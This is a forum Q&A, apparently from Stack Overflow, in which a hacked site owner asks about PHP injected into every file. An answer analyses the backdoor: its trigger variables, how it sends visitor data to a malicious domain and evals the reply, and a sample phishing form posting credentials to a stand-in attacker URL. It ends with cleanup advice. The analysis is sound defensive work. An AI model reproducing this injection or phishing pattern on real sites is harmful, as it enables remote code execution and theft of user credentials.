My website has been taken down by hackers, and looking through the site there is a load of additional stuff at the top of each PHP file.
Each file now starts with:
GLOBAL $wehaveitagain;
if($wehaveitagain != 1)
{
Full addition here
The database seems to be fine, so I am curious, what is the likely path of entry to be able to edit my files?
You're not the first to get hit by airschk
The exploit is based around a POST request with a variable prgetxr
being set.
If it isn't set (and likely, in normal use of the site, it won't be) it it cycles through that IP hash-map mynetsxx and if it finds that the requesting IP is in the network that matches this (to understand "network" you have to understand how networking works, but these are basically local guys, not remote), and if it is, it calls rewrioutclbkxxx
. You can manually request that function call by sending a GET request where a GET variable showmeallpls
is true.
rewrioutclbkxxx
is passed through output-buffer start, so it's likely going to screw with all the data BEFORE it's sent, but AFTER your normal code is done doing it's thing.
BEWARE, LIKELY A MALICIOUS DOMAIN BELOW DON'T GO UNLESS YOU KNOW WHAT YOU'RE DOING.
It's going to pull data from hxxp://airschk.com/clk
(I've censored the HTTP in that URL), it wants to get a bunch of data, so it sends a string that contains: user-agent (ie, the user's browser), their IP address, what URL they've requested, what page they came from, and the ID code 4dae82ac67843a194c000ca1
which is likely something they've set up to identify your server.
So in short, the code sends a whole whack of user information off to airschk, and it returns some data. That data gets tossed into an EVAL. Boom, your site is pwn'd.
EVAL will evaluate any string in there as if it's php. They can delete everything, edit everything, change anything they want, perhaps even get shell access. You're basically pwnt.
Now wait, what if we did send that POST request way back there? Oh sneaky, they've gone to a URL at toolbarqueries.google.com
, but the URL tries to jack up google page rank for the URL (Blackhat SEO, you can get banned from google for this, but in the short-term they get more hits).
airschk
.prgetxr
and GET requests of showmeallpls
.Since they can edit the output stream of your files on-demand and know the user-agent as well as IP address they probably can track your users. Lets say you're a bank, and this is your login HTML:
<form method="post" action="./login.php">
<input name="BankAccountNumber" />
<input name="Password" />
</form>
Okay, the output-buffer rewrite can actually keep everything exactly the way it is and do this to your users:
<p>We have noticed high activity on your account, please provide additional information to help secure your account.</p>
<form method="post" action="http://example.com/hax/lulz">
<input name="CreditCardNumber" />
<input name="SocialSecurityNumber" />
<input name="FullName" />
<input name="DateOfBirth" />
<input name="HomeAddress" />
<input name="BankAccountNumber" />
<input name="Password" />
<input name="prgetxr" />
</form>
Well, I'd say your whole server is never to be trusted again. Nuke the damn thing from orbit and re-install a backup.
Don't have a backup? What's wrong with you? Put a backup in place after you've hired someone to comb through every line of code, every database record, and every last file installed on your system because more exploits could be anywhere. Nuke the damn thing and install a backup.
Next, set chmod settings so these files cannot be edited by anyone other than an account that is NOT the web-account. You need to understand unix security.
Next, remove that damn eval from any file that runs on your server (maybe even configure suhosin). If you have any running code that depends on it, you're doing it wrong anyway. Remove it. You need to.
A band-aid measure will be to block the hacker domain, but this is totally worthless past 12 hours, they can just move elsewhere, and likely have by now.
I can't tell about the path of attack they took to do this, so that's a whole different investigation and not really a question for SO.
Security isn't trivial or easy or quick to learn. Don't play games, pay someone who knows what they're doing.
I do not know but the best way to find out is to see what ports are open on your machine. The web site that I use frequently to test firewalls etc is http://www.auditmypc.com/firewall-test.asp as it gives you a perspective from the outside world.
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With